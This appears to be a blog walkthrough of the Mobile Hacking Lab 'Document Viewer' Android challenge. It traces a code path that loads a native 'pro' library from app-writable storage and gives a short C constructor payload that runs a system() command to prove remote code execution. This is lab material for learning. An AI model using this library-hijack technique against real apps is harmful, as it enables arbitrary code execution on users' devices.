Document Viewer
Hello everyone , In this blog post , I will try to explain my solution steps for Document Viewer challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
install the app and open it
AndroidManifest.xml Examination :
we have a Main Activity Exported and contain an intent filter with action view and have a lot of schema like :
file - http - httpsand the mime type :application/pdf
image.png
Let’s analysis the Main activity code :
setLoadButtonListener(): This function sets up the button that lets users load a PDF file.handleIntent(): Handles incoming intents, such as when a user opens a PDF file directly from another app.renderPdf(Uri uri): This function renders the selected or received PDF file for viewing.requestStoragePermissionAsync(Continuation<? super Boolean> continuation)Requests storage permissions .
The important function here is the
loadProLibrary():the
Build.SUPPORTED_ABIS[0]identify the device's architecture (e.g., ARM, x86).the
(getApplicationContext().getFilesDir(), "native-libraries/" + abi): constructs the path to a folder within the app’s internal storage, where native libraries are storedthen constructs the full path to the Pro version of the native library (
libdocviewer_pro.so)System.load(libraryFile.getAbsolutePath())attempts to load the native library from the constructed path.If successful, it enables "Pro" features by setting
this.proFeaturesEnabled = true.
After i had decompile the APP i can’t any folder contain the libraries
The exploit here is
create a malicious libraryand then upload it to the path/data/data/com.mobilehackinglab.documentviewer/files/native-libraries/x86_64/when the app try to load this library we will if we found
rce.txtfile has been created then we success andget RCE#include <stdlib.h> __attribute__((constructor)) void execute_command() { system("touch /data/data/com.mobilehackinglab.documentviewer/rce.txt"); }Then compiled the
ccode to be a native library with :
then Push it to the path : and here we success
Last updated